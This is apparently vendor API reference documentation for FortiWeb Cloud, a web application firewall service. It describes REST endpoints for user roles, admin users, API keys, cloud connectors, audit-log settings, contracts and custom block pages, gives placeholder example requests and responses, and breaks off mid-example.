Download OpenAPI specification:Download
FortiWeb Cloud provides a powerful and flexible RESTful API that allows developers to access and modify the settings of FortiWeb applications programmatically. By leveraging the API, you can integrate FortiWeb Cloud functionality into your own applications, automate tasks, and manage resources more efficiently.
Programs communicate with the API over HTTPS, the same protocol that your web browser uses to interact securely with web pages.
The API is based on interactions with a web page. Data is treated like a static web page:
Add data by POSTing a web page
Fetch data by GETing a web page
Update data by PUTing a web page
Delete data by DELETEing a web page
After the FortiWeb Cloud API receives a request, it returns an HTTP response code. These codes are discussed later in this reference.
FortiWeb Cloud RESTful API requires API key authorization. An API Key tells our API server that the request it received came from you. Everything that you have access to in FortiWeb Cloud is accessible with an API Key that is generated by you.
For how to generate the API key, See API Key in Online Help.
FortiWeb Cloud RESTful API request is a standard HTTP request, which includes the HTTP header and HTTP body. Expected response can be returned only when the HTTP header and body meet the standard. The HTTP request header of FortiWeb Cloud RESTful API must include the following header lines:
FortiWeb Cloud RESTful API requires API key authorization. It is required to add the generated API key from FortiWeb Cloud GUI in the HTTP request header:
Authorization: Basic <api-key-secret>
For how to generate the API key, See API Key in Online Help.
It is required to use Accept field when sending an RESTful API request to show the accepted format.
The Accept field of most RESTful APIs is: Accept: application/json
The following headers are used by APIs documented.
| Header name | Value | Description |
|---|---|---|
| Accept | application/Json | Used to specify certain media types which are acceptable by the request; the value of the header should be application/json, which is not changeable. |
| Authorization | A random string from API Fetch Authorization Token | Used to specify the token for authorization. The token could be obtained through API Fetch Authorization Token, please see API Fetch Authorization for details. |
| Content-Type | application/json | Used to specify the content types which are acceptable by the request. The value of the header should be application/json, which is not changeable. |
| Method | Operation description |
|---|---|
| GET | Retrieves all configuration information of a resource. |
| POST | Creates new configuration information of a resource. |
| PUT | Updates the specified configuration information of a resource. |
| DELETE | Deletes the specified configuration infomration of a resource. |
| OPTIONS | Previews whether the server accepts the request. Once the preview is successful, the browser will send requests such as GET, PUT, etc. |
The URLs that you use to access FortiWeb Cloud APIs follow the following format:
https://api.fortiweb-cloud.com/v2/application/{ep_id}/{module_name}/
{} stands for variable.
| Variable | Description |
|---|---|
| {ep_id} | The ID of the apppication. When you click into an application on FortiWeb Cloud's Web UI, the ID of this application will show in the URL path. It's a 10-digit number. For example, if the URL path is https://www.fortiweb-cloud.com/root/1111122222/dashboard, then 1111122222 is the ep_id. |
| {module_name} | Name of the FortiWeb Cloud module. For example, "known_attacks". |
Fetch the list of user roles with basic info.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| attrs | string Attributes to fetch |
{- "roles": [
- {
- "id": "GLOBAL-Admin",
- "name": "Admin",
- "description": "The predefined admin role with read-write permission to all resources.",
- "is_predefined": true
}, - {
- "id": "d4e18791-7de3-4848-aaf7-838f1bacb873",
- "name": "test",
- "description": "test",
- "is_predefined": false
}
], - "policy_limit": {
- "/application": "rw",
- "/template": "rw",
- "/global_cloud_connectors": "rw",
- "/elog": "rw",
- "/admin": "rw",
- "/role": "rw",
- "/global_setting": "rw",
- "/contract": "rw",
- "/security_reports": "rw",
- "/custom_block_page": "rw",
- "/incidents": "rw",
- "/threat_analytics": "rw",
- "/mssp/tenant": "none",
- "/mssp/contracts": "none"
}, - "user_perm": "rw"
}Create an admin user.
A body including all parameters and values in the request that conforms to the following JSON schema:
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name | string Role name |
| description | string Role description |
| policy | object (SingleJsonObject) |
{- "name": "test-role",
- "description": "test",
- "policy": {
- "/application": "rw",
- "/template": "rw",
- "/global_cloud_connectors": "none",
- "/elog": "none",
- "/admin": "none",
- "/role": "none",
- "/global_setting": "none",
- "/contract": "none",
- "/security_reports": "none",
- "/custom_block_page": "none",
- "/incidents": "none",
- "/threat_analytics": "rw",
- "/mssp/tenant": "none",
- "/mssp/contracts": "none"
}
}{- "message": "Success"
}Fetch one user role.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| role_id required | string Role ID |
{- "name": "Admin",
- "id": "GLOBAL-Admin",
- "description": "The predefined admin role with read-write permission to all resources.",
- "policy": {
- "/application": "rw",
- "/global_setting": "rw",
- "/mssp/tenant": "rw",
- "/template": "rw",
- "/mssp/contracts": "rw",
- "/contract": "rw",
- "/admin": "rw",
- "/elog": "rw",
- "/role": "rw"
}, - "policy_limit": {
- "/application": "rw",
- "/template": "rw",
- "/elog": "rw",
- "/admin": "rw",
- "/role": "rw",
- "/global_setting": "rw",
- "/contract": "rw",
- "/mssp/tenant": "rw",
- "/mssp/contracts": "rw"
}, - "user_perm": "rw",
- "is_predefined": true
}Update the configuration of the admin user.
A body including all parameters and values in the request that conforms to the following JSON schema:
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| role_id required | string Role ID |
| name | string |
| description | string |
| policy | object (SingleJsonObject) |
{- "name": "new-role-name",
- "description": "role-description",
- "policy": {
- "/application": "rw",
- "/application/ep-id-1": "ro",
- "/application/ep-id-2": "rw",
- "/template": "rw",
- "/elog": "rw",
- "/admin": "ro",
- "/role": "ro",
- "/global_setting": "rw",
- "/mssp/tenant": "rw",
- "/mssp/contracts": "rw"
}
}{- "message": "Success"
}Delete an admin user.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| role_id required | string Role ID |
{- "message": "Success"
}Fetch the list of all admin users.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the "next_cursor" parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the "prev_cursor" value, then paste it here as the cursor value. |
| size | string The page size. |
| forward | string True: the next page; False: the previous page. |
{- "users": [
- {
- "user_id": "272c31be-0b3c-11ec-829a-a25f35c56340",
- "type": "Sub-user",
- "username": "subuser@demo.com",
- "role_name": "None",
- "role_id": "GLOBAL-None"
}, - {
- "user_id": "0a95a980-0534-11ec-981e-722c379e5840",
- "type": "IAM",
- "username": "iamuser@demo.com",
- "role_name": "Viewer",
- "role_id": "GLOBAL-Viewer"
}, - {
- "user_id": "98b15c01-3bbf-422d-a489-221cc7641d3c",
- "type": "Admin",
- "username": "test_user@demo.com",
- "role_name": "Application-manager",
- "role_id": "GLOBAL-Application-manager"
}
], - "user_perm": "rw",
- "prev_cursor": "eyJ1c2VyX2lkIjogeyJTIjogIjI3MmMzMWJlLTBiM2MtMTFlYy04MjlhLWEyNWYzNWM1NjM0MCJ9LCAic3VwZXJfaWQiOiB7IlMiOiAiZDg0ZjcwN2EtN2ExNC0xMWU5LWI2OWEtNWEyMDBkN2QzNWVlIn0sICJ1c2VyX25hbWUiOiB7IlMiOiAiMTI0NTQ2MEBxcS5jb20ifX0=",
- "next_cursor": "",
- "total": 4
}Get Admin User Detail.
{
"type": "object",
"required": ["username", "type", "role_id", "role_name"],
"properties": {
"username": {
"description": "External IDP role name",
"type": "string"
},
"type": {
"description": "Type of admin user",
"type": "string",
"enum": ["External IDP Role"]
},
"role_id": {
"description": "Role ID",
"type": "string"
},
"role_name": {
"description": "Role name",
"type": "string"
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| user_id required | string User ID |
{- "user_id": "aced2728-d7f6-11ed-853d-f53c116649e3",
- "super_id": "19293b5a-0b9d-11ec-885a-9edb87769c35",
- "username": "rolant@demo.com",
- "role_id": "GLOBAL-Viewer",
- "type": "Sub-user",
- "custom_policy": {
- "/application": "ro",
- "/application/5078356209": "rw",
- "/application/0459208517": "rw"
}, - "custom_policy_limit": {
- "/application": "rw"
}, - "role_name": "Viewer"
}Update an admin user.
{
"type": "object",
"required": ["username", "type", "role_id", "role_name"],
"properties": {
"username": {
"description": "External IDP role name",
"type": "string"
},
"type": {
"description": "Type of admin user",
"type": "string",
"enum": ["External IDP Role"]
},
"role_id": {
"description": "Role ID",
"type": "string"
},
"role_name": {
"description": "Role name",
"type": "string"
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| user_id required | string User ID |
| role_id | string Role ID |
| role_name | string Role name |
| user_id | string User ID |
| acc_id | string Account ID |
| type | string Admin type |
| username | string User name |
| custom_policy | object Custom Application Permissions |
{- "role_id": "GLOBAL-Viewer",
- "custom_policy": {
- "/application/5078356209": "rw",
- "/application/0459208517": "rw",
- "/application": "ro"
}
}{- "message": "Success"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
[- {
- "key_id": "key",
- "active": true,
- "created_at": 1666348404,
- "used_at": "1666348404"
}
]Requires API key secret as Authorization request header. See Request format section for API key secret details.
{ }{- "key_id": "ID value.",
- "key_secret": "API key token."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| key_id required | string |
| active | boolean |
{- "active": false
}{- "message": "Success"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| key_id required | string |
{- "message": "string"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
{- "user_perm": "rw",
- "total": "3",
- "connectors": [
- {
- "name": "aws cloud connector",
- "type": "aws",
- "status": "enable",
- "region": "us-east-1",
- "access_key_id": "key example",
- "aws_secret_access_key": "access key example",
- "have_vpc_id": "disable"
}, - {
- "name": "azure cloud connector",
- "type": "azure",
- "status": "enable",
- "client_id": "client UUID",
- "client_secret": "client key",
- "have_resource_group": "enable",
- "resource_group": "resource group name",
- "server_region": "global",
- "have_resource_path": "enable",
- "subscription_id": "subscription UUID",
- "tenant_id": "user UUID "
}, - {
- "name": "gcp cloud connector",
- "type": "gcp",
- "status": "enable",
- "zone": "us-central1-a",
- "project_id": "project name",
- "private_key": "user key",
- "service_account_email": "account email"
}
]
}Create a Cloud Connector.
{
"type": "object",
"properties": {
"name": {
"description": "The unique name of the Cloud Connector, required.",
"type": "string"
},
"status": {
"description": "The status of the Cloud Connector, required.",
"type": "string",
"enum": ["disable", "enable"]
},
"type": {
"description": "The type of the Cloud Connector, required.",
"type": "string",
"enum": ["aws", "azure", "gcp"]
},
"region": {
"description": "The region of the AWS Account, required if 'type': 'aws'.",
"type": "string"
},
"access_key_id": {
"description": "The Access Key ID of the AWS Account, required if 'type': 'aws'.",
"type": "string"
},
"aws_secret_access_key": {
"description": "The Secret Access Key of the AWS Account, required if 'type': 'aws'.",
"type": "string"
},
"have_vpc_id": {
"description": "Whether to specify VPC ID, required if 'type': 'aws'.",
"type": "string",
"enum": ["disable", "enable"]
},
"vpc_id": {
"description": "The VPC ID of the AWS Account, required if 'type': 'aws' and 'have_vpc_id': 'enable'.",
"type": "string"
},
"server_region": {
"description": "The region of the Azure Account, required if 'type': 'azure'.",
"type": "string",
"enum": ["global", "china", "germany", "us_gov"]
},
"tenant_id": {
"description": "The Tenant ID of the Azure Account, required if 'type': 'azure'.",
"type": "string"
},
"client_id": {
"description": "The Client ID of the Azure Account, required if 'type': 'azure'.",
"type": "string"
},
"client_secret": {
"description": "The Client Secret of the Azure Account, required if 'type': 'azure'.",
"type": "string"
},
"have_resource_path": {
"description": "Whether to specify Subscription ID, required if 'type': 'azure'.",
"type": "string",
"enum": ["disable", "enable"]
},
"subscription_id": {
"description": "The Subscription ID of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable'.",
"type": "string"
},
"have_resource_group": {
"description": "Whether to specify Resource Group, required if 'type': 'azure' and 'have_resource_path': 'enable'.",
"type": "string",
"enum": ["disable", "enable"]
},
"resource_group": {
"description": "The Resource Group of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.",
"type": "string"
},
"project_id": {
"description": "The Project ID of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
},
"service_account_email": {
"description": "The Service Account E-Mail of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
},
"private_key": {
"description": "The Private Key of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
},
"zone": {
"description": "The Zone of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{
"name": "aws_connector_1",
"status": "enable",
"type": "aws",
"region": "ap-southeast-1",
"access_key_id": "XXXXXXXXXXXXXXXXXXXX",
"aws_secret_access_key": "*",
"have_vpc_id": "enable",
"vpc_id": "vpc-0a268fa6b745cfb3a"
}
{
"name": "gcp_connector_1",
"status": "enable",
"type": "gcp",
"project_id": "project-001",
"service_account_email": "test@project-001.iam.gserviceaccount.com",
"private_key": "*",
"zone": "us-west1-a"
}
{
"name": "azure_connector_1",
"status": "enable",
"type": "azure",
"server_region": "global",
"tenant_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"client_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"client_secret": "*",
"have_resource_path": "enable",
"subscription_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"have_resource_group": "enable",
"resource_group": "cldwafCluster_koreacentral_4"
}
{ }{- "detail": "Create Cloud Connector successfully."
}Modify the Cloud Connector's configuration.
{
"type": "object",
"properties": {
"name": {
"description": "The unique name of the Cloud Connector, required.",
"type": "string"
},
"status": {
"description": "The status of the Cloud Connector, required.",
"type": "string",
"enum": ["disable", "enable"]
},
"type": {
"description": "The type of the Cloud Connector, required.",
"type": "string",
"enum": ["aws", "azure", "gcp"]
},
"region": {
"description": "The region of the AWS Account, required if 'type': 'aws'.",
"type": "string"
},
"access_key_id": {
"description": "The Access Key ID of the AWS Account, required if 'type': 'aws'.",
"type": "string"
},
"aws_secret_access_key": {
"description": "The Secret Access Key of the AWS Account, required if 'type': 'aws'.",
"type": "string"
},
"have_vpc_id": {
"description": "Whether to specify VPC ID, required if 'type': 'aws'.",
"type": "string",
"enum": ["disable", "enable"]
},
"vpc_id": {
"description": "The VPC ID of the AWS Account, required if 'type': 'aws' and 'have_vpc_id': 'enable'.",
"type": "string"
},
"server_region": {
"description": "The region of the Azure Account, required if 'type': 'azure'.",
"type": "string",
"enum": ["global", "china", "germany", "us_gov"]
},
"tenant_id": {
"description": "The Tenant ID of the Azure Account, required if 'type': 'azure'.",
"type": "string"
},
"client_id": {
"description": "The Client ID of the Azure Account, required if 'type': 'azure'.",
"type": "string"
},
"client_secret": {
"description": "The Client Secret of the Azure Account, required if 'type': 'azure'.",
"type": "string"
},
"have_resource_path": {
"description": "Whether to specify Subscription ID, required if 'type': 'azure'.",
"type": "string",
"enum": ["disable", "enable"]
},
"subscription_id": {
"description": "The Subscription ID of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable'.",
"type": "string"
},
"have_resource_group": {
"description": "Whether to specify Resource Group, required if 'type': 'azure' and 'have_resource_path': 'enable'.",
"type": "string",
"enum": ["disable", "enable"]
},
"resource_group": {
"description": "The Resource Group of the Azure Account, required if 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.",
"type": "string"
},
"project_id": {
"description": "The Project ID of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
},
"service_account_email": {
"description": "The Service Account E-Mail of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
},
"private_key": {
"description": "The Private Key of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
},
"zone": {
"description": "The Zone of the GCP Account, required if 'type': 'gcp'.",
"type": "string"
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{
"name": "aws_connector_1",
"status": "enable",
"type": "aws",
"region": "ap-southeast-1",
"access_key_id": "XXXXXXXXXXXXXXXXXXXX",
"aws_secret_access_key": "*",
"have_vpc_id": "enable",
"vpc_id": "vpc-0a268fa6b745cfb3a"
}
{
"name": "gcp_connector_1",
"status": "enable",
"type": "gcp",
"project_id": "project-001",
"service_account_email": "test@project-001.iam.gserviceaccount.com",
"private_key": "*",
"zone": "us-west1-a"
}
{
"name": "azure_connector_1",
"status": "enable",
"type": "azure",
"server_region": "global",
"tenant_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"client_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"client_secret": "*",
"have_resource_path": "enable",
"subscription_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"have_resource_group": "enable",
"resource_group": "cldwafCluster_koreacentral_4"
}
{ }{- "detail": "Update Cloud Connector successfully."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name required | string connector name |
{- "detail": "Delete Cloud Connector successfully."
}Test the Connector whether its connection can be established.
{
"type": "object",
"properties": {
"type": {
"description": "The type of the Cloud Connector, required.",
"type": "string",
"enum": ["aws", "azure", "gcp"]
},
"is_encrypted": {
"description": "Whether it('aws_secret_access_key', 'client_secret', 'private_key') is encrypted or plain text, required.",
"type": "string",
"enum": ["true", "false"]
},
"region": {
"description": "The region of the AWS Account, required on 'type': 'aws'.",
"type": "string"
},
"access_key_id": {
"description": "The Access Key ID of the AWS Account, required on 'type': 'aws'.",
"type": "string"
},
"aws_secret_access_key": {
"description": "The Secret Access Key of the AWS Account, required on 'type': 'aws'.",
"type": "string"
},
"have_vpc_id": {
"description": "Whether to specify VPC ID, required on 'type': 'aws'.",
"type": "string",
"enum": ["disable", "enable"]
},
"vpc_id": {
"description": "The VPC ID of the AWS Account, required on 'type': 'aws' and 'have_vpc_id': 'enable'.",
"type": "string"
},
"server_region": {
"description": "The region of the Azure Account, required on 'type': 'azure'.",
"type": "string",
"enum": ["global", "china", "germany", "us_gov"]
},
"tenant_id": {
"description": "The Tenant ID of the Azure Account, required on 'type': 'azure'.",
"type": "string"
},
"client_id": {
"description": "The Client ID of the Azure Account, required on 'type': 'azure'.",
"type": "string"
},
"client_secret": {
"description": "The Client Secret of the Azure Account, required on 'type': 'azure'.",
"type": "string"
},
"have_resource_path": {
"description": "Whether to specify Subscription ID, required on 'type': 'azure'.",
"type": "string",
"enum": ["disable", "enable"]
},
"subscription_id": {
"description": "The Subscription ID of the Azure Account, required on 'type': 'azure' and 'have_resource_path': 'enable'.",
"type": "string"
},
"have_resource_group": {
"description": "Whether to specify Resource Group, required on 'type': 'azure' and 'have_resource_path': 'enable'.",
"type": "string",
"enum": ["disable", "enable"]
},
"resource_group": {
"description": "The Resource Group of the Azure Account, required on 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.",
"type": "string"
},
"project_id": {
"description": "The Project ID of the GCP Account, required on 'type': 'gcp'.",
"type": "string"
},
"service_account_email": {
"description": "The Service Account E-Mail of the GCP Account, required on 'type': 'gcp'.",
"type": "string"
},
"private_key": {
"description": "The Private Key of the GCP Account, required on 'type': 'gcp'.",
"type": "string"
},
"zone": {
"description": "The Zone of the GCP Account, required on 'type': 'gcp'.",
"type": "string"
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{
"type": "aws",
"region": "ap-southeast-1",
"access_key_id": "XXXXXXXXXXXXXXXXXXXX",
"is_encrypted": "false",
"aws_secret_access_key": "*",
"have_vpc_id": "enable",
"vpc_id": "vpc-04168fa6b745cfb3a"
}
{
"type": "gcp",
"project_id": "project-001",
"service_account_email": "test@project-001.iam.gserviceaccount.com",
"is_encrypted": "false",
"private_key": "*",
"zone": "us-west1-a"
}
{
"type": "azure",
"server_region": "global",
"tenant_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"client_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"is_encrypted": "false",
"client_secret": "*",
"have_resource_path": "enable",
"subscription_id": "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"have_resource_group": "enable",
"resource_group": "cldwafCluster_koreacentral_4"
}
{ }{- "detail": "Connect the Cloud Connector successfully."
}Used on Origin Servers page. Retrieve the public IP addresses list of a selected cloud resource.
json {"cloud_connector":"name","filter":[{"Name":"tag:Name","Values":["filter value"]}]}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{- "cloud_connector": "connector name",
- "filter": [
- {
- "Name": "tag:Name",
- "Values": [
- "filter_name_value"
]
}
]
}{- "public_ip": [
- "1.2.3.4",
- "2.3.4.4"
], - "total": 2
}Used in Origin Servers page. Get the filter options list of a specific cloud connector.
| cloud_connector required | string connector name |
{- "detail": "Bad request."
}Get the global setting configurations.
{- "ESServer": {
- "address": "es-server-host or IP address",
- "port": "9243",
- "username": "elastic",
- "password": "encrypted password",
- "syslog_type": "elog",
- "server_type": "elasticsearch"
}, - "AuditEnable": 1,
- "ServerType": "elasticsearch",
- "NotificationEnable": true,
- "user_perm": "rwa",
- "AdvancedConfiguration": "disable"
}A body including all parameters and values in the request that conforms to the following JSON schema:
{
"type": "object",
"required": ["AuditEnable", "WeeklyEnable", "WeekReport", "AuditLog", "ServerType"],
"properties": {
"AuditEnable": {
"description": "Select 0 to disable exporting audit logs, or select 1 to enable exporting audit logs",
"type": "int",
"enum": [0,1],
"default": 0
},
"WeeklyEnable": {
"description": "Select 0 to disable sending weekly report or select 1 to enable sending weekly report",
"type": "int",
"enum": [0,1],
"default": 0
},
"WeekReport": {
"description": "Configure weekly report configuration",
"type": "object",
"properties": {
"email":{
"description": "Configure the email address that receives the weekly report",
"type": "string"
},
"email_default":{
"description": "Select 0 to define the email address that receives the weekly report or 1 to send the weekly report to the default email address",
"type": "int",
"enum": [0,1]
}
}
},
"AdvancedConfiguration": {
"description": "Enable/Disable the advanced configurations.",
"type": "string",
"enum": ["disable", "enable"],
"default": "disable"
},
"ServerType": {
"description": "The type of the AuditLog server.",
"type": "string",
"enum": ["syslog", "elasticsearch"],
"default": "syslog"
},
"AuditLog": {
"description": "Configure syslog server for auditing log",
"type": "object",
"required": ["server_type", "syslog_type", "address", "port", "protocol", "cert_signed", "type", "value"],
"properties":{
"server_type": {
"description": "The type of the server, should be 'syslog' here.",
"type": "string",
"enum": ["syslog", "elasticsearch"]
},
"syslog_type": {
"description": "The type of the log content, should be 'elog' here.",
"type": "string",
"enum": ["alog", "elog"]
},
"address": {
"description": "Configure the syslog server address or domain",
"type": "string"
},
"port": {
"description": "Configure the syslog server listened port.",
"type": "int"
},
"protocol": {
"description": "Select the protocol that connects to syslog server.",
"type": "string",
"enum": ["TCP","UDP","SSL"],
"default": "UDP"
},
"cert_signed": {
"description": "Use customer cert (0) or default self-signed cert (1)",
"type": "string",
"enum": [0, 1],
"default": "1"
},
"pkey": {
"description": "Private key of cert",
"type": "string"
},
"pkey_passwd": {
"description": "Enter the password of private key",
"type": "string"
},
"type": {
"description": " The type of the log template",
"type": "string",
"enum": ["default", "splunk", "cef0_arcsight", "azure_oms", "leef1_qradar", "custom"],
"default": "default"
},
"value": {
"description": "The template content of corresponding type",
"type": "string"
},
"facility": {
"description": "The Syslog facility value",
"type": "string",
"enum": ["local0", "local1","local2", "local3","local4", "local5","local6", "local7"],
"default": "local0"
}
}
},
"ESServer": {
"description": "Configure elaseticsearch server for auditing log",
"type": "object",
"required": ["server_type", "syslog_type", "address", "port", "username", "password"],
"properties":{
"server_type": {
"description": "The type of the server, should be 'elasticsearch' here.",
"type": "string",
"enum": ["syslog", "elasticsearch"]
},
"syslog_type": {
"description": "The type of the log content, should be 'elog' here.",
"type": "string",
"enum": ["alog", "elog"]
},
"address": {
"description": "Configure the elasticsearch address or domain",
"type": "string"
},
"port": {
"description": "Configure the elasticsearch server listened port.",
"type": "int"
},
"username": {
"description": "The username of the elasticsearch server.",
"type": "string"
},
"password": {
"description": "The password of the elasticsearch server",
"type": "string"
}
}
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{- "AuditEnable": 1,
- "ServerType": "elasticsearch",
- "AdvancedConfiguration": "disable",
- "ESServer": {
- "address": "es_server-host.com",
- "port": "9243",
- "username": "elastic",
- "password": "123456",
- "server_type": "elasticsearch",
- "syslog_type": "elog"
}
}{- "detail": "Global setting change success."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
{ }{- "message": "Bad request."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| status | string Enum: "enable" "disable" |
{- "status": "enable"
}Update the active contract types, the Fortinet license or AWS/Azure/GCP subscription.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| contract_type | string Enum: "aws" "aws_contract" "azure" "fortinet" "gcp" Contract type |
{- "contract_type": "{{contract_type}}"
}{ }Get the contracts information.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| type | string Value: "remains" The remained contracts list not allocated by MSSP. (optional) |
{- "aws_subscription_status": "subscribe-success",
- "summary": {
- "used_sites": 1,
- "sum_sites": 1,
- "percentile_bandwidth": 0,
- "sum_bandwidth": 5
}, - "fortinet": {
- "sn": "FWBCLD0000000172",
- "sum_sites": 1,
- "sum_bandwidth": 5,
- "start_date": "2018-12-19 00:00:00Z",
- "expiration_date": "2019-12-19 00:00:00Z",
- "status": "valid",
- "contract_list": [
- {
- "contract_number": "7288CN345270",
- "bandwidth": 5,
- "start_date": "2018-12-19 00:00:00Z",
- "end_date": "2019-12-19 00:00:00Z",
- "status": "valid"
}, - {
- "contract_number": "7766KY405757",
- "applications": 1,
- "start_date": "2018-12-19 00:00:00Z",
- "end_date": "2019-12-19 00:00:00Z",
- "status": "valid"
}
]
}, - "aws": {
- "sum_sites": "Unlimited",
- "sum_bandwidth": "Unlimited",
- "start_date": "2019-05-20 03:25:38Z",
- "expiration_date": "Unlimited",
- "status": "inactive"
}
}Get the list of custom block page messages Includes both predefined messages and customized messages.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{- "data": [
- {
- "name": "Predefined",
- "description": "Predefined message",
- "type": "Predefined"
}, - {
- "name": "new_page",
- "description": "for block request",
- "type": "Custom"
}, - {
- "name": "message name",
- "description": "for demo",
- "type": "Custom"
}, - {
- "name": "message 2",
- "description": "for test",
- "type": "Custom"
}
], - "limit": 8,
- "total": 4,
- "user_perm": "rw"
}Create a Custom Block Page Message.
{
"type": "object",
"properties": {
"name": {
"description": "The unique name of the Custom Block Message, with number, letter or underscore. Required. Maximum length is 30.",
"type": "string"
},
"description": {
"description": "The description of Custom Block Message. optional.",
"type": "string"
},
"content": {
"description": "The type of the Cloud Connector, required.",
"type": "array",
"properties": {
"name": {
"description": "name of page, required.",
"type": "string",
"enum": ["Attack Block Page", "Server Unavailable Page", "Captcha Enforcement Page", "Captcha Block Page"]
},
"id": {
"description": "Identity of message, required. ",
"type": "string",
"enum": ["url-block", "server-inaccessible", "captcha-page", "captcha-block"]
},
"group": {
"description": "Group name. required.",
"type": "string",
"enum": ["Security", "Captcha"]
},
"http_response_code": {
"description": "Response code",
"type": "number"
},
"description": {
"description": "optional",
"type": "string"
},
"msg": {
"description": "Content of message detail, in HTML format. required.",
"type": "string",
}
}
}
}
}
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name | string message name. maximum length 30 |
| description | string maximum length 256 |
| type | string Enum values: predefined, custom |
| content | Array of objects (SingleJsonObject) In this array, there are 4 fixed items which name, group and http code are not editable |
{- "name": "new_page",
- "description": "for test",
- "type": "Custom",
- "content": [
- {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Attack Block Page",
- "description": "Replacement HTML for Attack Block Page",
- "id": "url-block",
- "group": "Security",
- "http_response_code": 500
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Server Unavailable Page",
- "description": "Replacement HTML for Server Unavailable Page",
- "id": "server-inaccessible",
- "group": "Security",
- "http_response_code": 503
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Captcha Enforcement Page",
- "description": "Replacement HTML for Captcha Enforcement Page",
- "id": "captcha-page",
- "group": "Captcha",
- "http_response_code": 200
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Captcha Block Page",
- "description": "Replacement HTML for Captcha Block Page",
- "id": "captcha-block",
- "group": "Captcha",
- "http_response_code": 200
}
]
}{- "message": "Custom block page was created successfully."
}Request body schema is same to the one of Creating Custom Block Page.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name | string message name. maximum length 30 |
| description | string maximum length 256 |
| type | string Enum values: predefined, custom |
| content | Array of objects (SingleJsonObject) In this array, there are 4 fixed items which name, group and http code are not editable |
{- "name": "new_page",
- "description": "for test",
- "type": "Custom",
- "content": [
- {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Attack Block Page",
- "description": "Replacement HTML for Attack Block Page",
- "id": "url-block",
- "group": "Security",
- "http_response_code": 500
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Server Unavailable Page",
- "description": "Replacement HTML for Server Unavailable Page",
- "id": "server-inaccessible",
- "group": "Security",
- "http_response_code": 503
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Captcha Enforcement Page",
- "description": "Replacement HTML for Captcha Enforcement Page",
- "id": "captcha-page",
- "group": "Captcha",
- "http_response_code": 200
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Captcha Block Page",
- "description": "Replacement HTML for Captcha Block Page",
- "id": "captcha-block",
- "group": "Captcha",
- "http_response_code": 200
}
]
}{- "message": "Custom block page was updated successfully."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name required | string message name. Predefined messages can not be deleted. |
{- "message": "Custom block page was deleted successfully"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| to_name | string new message name |
| from_name | string cloned from this message |
{- "from_name": "Existing message name that is to be cloned",
- "to_name": "new message name"
}{- "message": "Operation is successful"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| message_name required | string |
{- "name": "new_block_url",
- "description": "Block and display error",
- "type": "Custom",
- "content": [
- {
